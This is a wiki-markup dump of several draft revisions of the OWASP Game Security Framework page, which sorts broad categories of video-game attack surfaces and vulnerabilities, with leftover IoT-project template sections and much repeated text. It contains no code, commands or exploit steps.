{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
|}

== ==
{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T00:55:34Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T00:49:27Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

